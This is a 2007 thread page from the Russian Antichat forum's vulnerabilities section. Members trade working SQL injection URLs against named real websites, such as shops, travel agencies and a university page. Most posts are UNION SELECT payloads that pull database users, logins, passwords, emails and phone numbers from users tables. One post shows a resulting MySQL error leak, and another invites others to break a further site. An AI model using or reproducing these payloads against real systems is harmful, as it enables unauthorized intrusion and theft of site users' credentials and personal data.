ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #591  
Старый 26.02.2007, 23:25
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://www.reusablebags.com/news.php?id=-14%20UNION%20SELECT%200,1,2,3,4,5,6,7,8/*
Цитата:
http://www.eventor.ru/news.php?id=-4999999994%20union%20select%201,2,3,4,5,6,7,8/*
Цитата:
http://www.spex.de/web/news.php?id=-2395%20UNION%20SELECT%200,1,2,3,4,5,user,password, 8,9,10,11,12,13,14,15,16%20from%20mysql.user/*
Цитата:
http://www.abajour.ru/news.php?id=-18%20UNION%20SELECT%200,id,concat(login,char(58),p ass),3,4%20from%20users/*
))
 
Ответить с цитированием

  #592  
Старый 26.02.2007, 23:49
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.5557.ru/price_all.php?el=-1+union+select+1,user(),3,4,5/*

http://www.ural-market.com/auto_desc.php?Type=1&CodeTech=-1+union+select+user(),2,3,database(),5,6,7,8,9,10,11,12/*

http://www.mcmtravel.ru/excursions/mntur.php?type=-1+union+select+1,user(),3,4,5,6,7,8,9,10/*

Последний раз редактировалось Grey; 27.02.2007 в 00:18..
 
Ответить с цитированием

  #593  
Старый 27.02.2007, 01:15
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

_http://www.entrepreneurship.appstate.edu/news.php?id=-99+union+select+1,user(),3,database(),5,6/*
ничего не смог вывести

Последний раз редактировалось злюка; 27.02.2007 в 02:16..
 
Ответить с цитированием

  #594  
Старый 27.02.2007, 02:10
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от злюка  
_http://www.entrepreneurship.appstate.edu/news.php?id=-99+union+select+1,user(),3,database(),5,6/*
ничего не смог вывести
таблицы некоторые нашел но ничего интересного в них нету

Последний раз редактировалось }{0TT@БЬ)Ч; 27.02.2007 в 02:22..
 
Ответить с цитированием

  #595  
Старый 27.02.2007, 02:19
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

http://www.mediacomp.ru/?action=sub_kat&top_kat=-3+union+select+1,2,3/*

Последний раз редактировалось }{0TT@БЬ)Ч; 27.02.2007 в 02:26..
 
Ответить с цитированием

  #596  
Старый 27.02.2007, 02:32
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://allo-mebel.ru/shop/?dir=59'

http://boardsearch.ru/index.php?sect_id=1&rubric_id=34'

Цитата:
<title>Поиск <h1>Warning!</h1>
<p>Class mysql: Method SelectRow: can not complete request (SELECT * FROM rubrics WHERE rubric_id = 34\' LIMIT 1): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1</p>
/ </title>

Последний раз редактировалось *D1VER; 27.02.2007 в 03:02..
 
Ответить с цитированием

  #597  
Старый 27.02.2007, 09:46
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Код:
http://allo-mebel.ru/shop/?dir=33-1
http://allo-mebel.ru/shop/?dir=32
иньекции нету.

А вот эта понравилась...
Код:
http://boardsearch.ru/index.php?sect_id=1&rubric_id=-1+UNION+SELECT+3,2,1/*
http://boardsearch.ru/index.php?sect_id=1&rubric_id=-1+UNION+SELECT+null,999999999999,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71)/*
хек-хек
Код:
http://boardsearch.ru/index.php?sect_id=1&rubric_id=-1+UNION+SELECT+null,999999999999,concat(user_id,char(58),email,char(58),password,char(58),name,char(58),phone)+from+users/*
 
Ответить с цитированием

  #598  
Старый 27.02.2007, 12:18
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

И на старуху бывает проруха.

Цитата:
http://www.thegoldindex.com/?page=directory&item=30'
Вот на мой взгляд скули тут нету но сломать надо.
Кто расковыряет постипм сюда, но скули там нету имхо.
 
Ответить с цитированием

  #599  
Старый 27.02.2007, 12:53
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.sobolmarket.ru/index.php?page=-1+union+select+user()/*

http://www.stmaster.ru/price.php?razd=-1+union+select+1,user()/*

http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15/*

Последний раз редактировалось Grey; 27.02.2007 в 13:25..
 
Ответить с цитированием

  #600  
Старый 27.02.2007, 14:30
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
Сообщение от Grey  
http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13, 14,15/*
Цитата:
http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,id,4,concat(name,char(58),login ,char(58),password,char(58)),6,7,8,9,10,11,12,13,1 4,15%20from%20users/*
))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ